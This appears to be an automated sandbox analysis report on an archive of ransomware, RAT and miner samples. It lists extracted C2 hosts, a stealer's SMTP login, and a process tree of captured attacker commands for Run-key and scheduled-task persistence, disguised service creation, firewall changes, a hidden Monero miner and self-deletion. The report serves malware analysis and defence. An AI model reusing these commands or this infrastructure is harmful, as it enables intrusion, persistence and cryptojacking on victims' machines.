Overview

overview

10

Static

static

1

RNSM00439.7z

windows10-2004-x64

10

Resubmissions

24-10-2024 21:03

241024-zv5dlathjf 1

Analysis

  • max time kernel
    161s
  • max time network
    165s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-10-2024 17:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00439.7z

  • Size

    106.7MB

  • MD5

    63c3e9eaea5a68b2e6eb2cbe628ebbae

  • SHA1

    00e621930a325dbf2af253f92199e720697da9c1

  • SHA256

    3446df3ed44fb3b1c5d9da71fbb19c82b44105827aaaab34f68bc30df01a936c

  • SHA512

    73e2d4f0393defc504ec8dc20f3c7b5d4e0452d195d42aa5442ba8c88b5b6681a19c6027c6817dc5df32e9548bf4b38e63cd0155094dd41d7e5457ed3b6383a9

  • SSDEEP

    3145728:CTYNxP7DTS3kYmW5WiFT81N7bhgRiDqX5tv8qDu:cYNd7DTjYz5W6T81N71g+U1R6

Score
10/10
agentteslaasyncratbitratnanocoretofseexmrigzgratagilenetdefense_evasiondiscoveryevasionexecutionkeyloggerminerpersistenceprivilege_escalationransomwareratspywarestealertrojanupxvmprotect

Malware Config

Extracted

Family

tofsee

C2

43.231.4.7

lazystax.ru

Extracted

Family

nanocore

Version

1.2.2.0

C2

dbep.duckdns.org:54920

warqazx.strangled.net:54920
Mutex

2d2dca86-7818-426c-9e84-55f634ea61fc

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    warqazx.strangled.net

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2021-03-07T16:37:38.065258936Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    54920

  • default_group

    26thmay

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    2d2dca86-7818-426c-9e84-55f634ea61fc

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    dbep.duckdns.org

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.privateemail.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    computer.com

Extracted

Family

bitrat

Version

1.35

C2

wdupdate.duckdns.org:4455

Attributes
  • communication_password

    bfe6c14c945256de12a6add92c83b4d9

  • tor_process

    tor

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Agenttesla family
    agenttesla
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

    trojanbitrat
  • Bitrat family
    bitrat
  • Detect ZGRat V2 2 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

    keyloggertrojanstealerspywarenanocore
  • Nanocore family
    nanocore
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Tofsee family
    tofsee
  • Xmrig family
    xmrig
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Zgrat family
    zgrat
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • AgentTesla payload 1 IoCs
  • Renames multiple (121) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • XMRig Miner payload 7 IoCs
    miner
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Manipulates Digital Signatures 1 TTPs 2 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • System Binary Proxy Execution: InstallUtil 1 TTPs 2 IoCs

    Abuse InstallUtil to proxy execution of malicious code.

    defense_evasion
  • System Binary Proxy Execution: Regsvcs/Regasm 1 TTPs 2 IoCs

    Abuse Regasm to proxy execution of malicious code.

    defense_evasion
  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

    miner
  • Drops startup file 7 IoCs
  • Executes dropped EXE 64 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Drops desktop.ini file(s) 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00439.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4808
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3288
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Checks computer location settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2656
      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe
        3⤵
        • System Binary Proxy Execution: Regsvcs/Regasm
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2976
        • C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
          C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
          4⤵
          • Checks whether UAC is enabled
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:7464
      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4836
        • C:\Users\Admin\AppData\Roaming\Services.exe
          "C:\Users\Admin\AppData\Roaming\Services.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4280
      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3592
      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        PID:3744
      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2996
        • C:\Users\Admin\AppData\Roaming\Chrome1.exe
          "C:\Users\Admin\AppData\Roaming\Chrome1.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          PID:3092
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=70 --donate-level=5
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:5160
      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe
        3⤵
        • System Binary Proxy Execution: InstallUtil
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:3412
        • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
          "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:6524
      • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe
        3⤵
        • System Binary Proxy Execution: Regsvcs/Regasm
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        PID:4364
        • C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
          C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
          4⤵
            PID:6236
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 92
              5⤵
              • Program crash
              PID:7720
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 100
              5⤵
              • Program crash
              PID:4100
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 6236 -s 128
              5⤵
              • Program crash
              PID:2824
        • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe
          HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe
          3⤵
          • System Binary Proxy Execution: InstallUtil
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4868
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "mdwm" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Local\mdwm.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:5304
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "mdwm" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Local\mdwm.exe"
              5⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:5768
          • C:\Users\Admin\AppData\Roaming\BUSY PATCH all in one.exe
            "C:\Users\Admin\AppData\Roaming\BUSY PATCH all in one.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:7572
          • C:\Users\Admin\AppData\Roaming\Local\mdwm.exe
            "C:\Users\Admin\AppData\Roaming\Local\mdwm.exe"
            4⤵
            • Checks computer location settings
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6436
            • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
              "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
              5⤵
                PID:7164
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 188
                  6⤵
                  • Program crash
                  PID:7524
              • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
                "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
                5⤵
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • NTFS ADS
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:7444
              • C:\Users\Admin\AppData\Local\Temp\wdhost.exe
                "C:\Users\Admin\AppData\Local\Temp\wdhost.exe"
                5⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4876
                • C:\Users\Admin\AppData\Local\Temp\wdhost.exe
                  "C:\Users\Admin\AppData\Local\Temp\wdhost.exe"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5364
          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe
            HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5060
            • C:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe
              "C:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe"
              4⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:4316
          • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe
            HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe
            3⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1620
            • C:\Windows\System32\notepad.exe
              "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Name of your explain.txt
              4⤵
                PID:2064
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe
              HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe
              3⤵
              • Executes dropped EXE
              • Drops desktop.ini file(s)
              • System Location Discovery: System Language Discovery
              PID:4664
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 1136
                4⤵
                • Program crash
                PID:2008
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exe
              HEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exe
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:2796
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe
              HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1368
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "user" /tr '"C:\Users\Admin\AppData\Roaming\user.exe"' & exit
                4⤵
                • System Location Discovery: System Language Discovery
                PID:6780
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "user" /tr '"C:\Users\Admin\AppData\Roaming\user.exe"'
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:5168
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCD7.tmp.bat""
                4⤵
                • System Location Discovery: System Language Discovery
                PID:7356
                • C:\Windows\SysWOW64\timeout.exe
                  timeout 3
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:7644
                • C:\Users\Admin\AppData\Roaming\user.exe
                  "C:\Users\Admin\AppData\Roaming\user.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6120
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe
              HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3468
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" –NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\DACB.tmp\DACC.tmp\DACD.ps1
                4⤵
                • Manipulates Digital Signatures
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1280
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe
              HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks SCSI registry key(s)
              • Suspicious use of AdjustPrivilegeToken
              PID:5112
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exe
              HEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exe
              3⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              PID:4956
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bbf531fd397dbdb4ab9552299c677b007bf08c53f3b5a38628be1742a04e7cf8.exe
              HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bbf531fd397dbdb4ab9552299c677b007bf08c53f3b5a38628be1742a04e7cf8.exe
              3⤵
              • Executes dropped EXE
              PID:4964
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe
              HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe
              3⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4652
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ywwikdvr\
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5412
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hjcnucqg.exe" C:\Windows\SysWOW64\ywwikdvr\
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5520
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" create ywwikdvr binPath= "C:\Windows\SysWOW64\ywwikdvr\hjcnucqg.exe /d\"C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe\"" type= own start= auto DisplayName= "wifi support"
                4⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5664
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" description ywwikdvr "wifi internet conection"
                4⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5800
              • C:\Windows\SysWOW64\sc.exe
                "C:\Windows\System32\sc.exe" start ywwikdvr
                4⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:5156
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                4⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                PID:5964
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4652 -s 700
                4⤵
                • Program crash
                PID:8140
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Darkside.gen-d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7.exe
              HEUR-Trojan-Ransom.Win32.Darkside.gen-d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7.exe
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:5320
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe
              HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe
              3⤵
              • Drops startup file
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:5648
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                • System Network Configuration Discovery: Internet Connection Discovery
                PID:3232
                • C:\Windows\SysWOW64\PING.EXE
                  ping 1.1.1.1 -n 1 -w 3000
                  5⤵
                  • System Location Discovery: System Language Discovery
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:7276
            • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
              HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of SetWindowsHookEx
              PID:6404
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5808
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6748
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6760
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6772
              • C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                C:\Users\Admin\Desktop\00439\HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe
                4⤵
                • Executes dropped EXE
                PID:6796
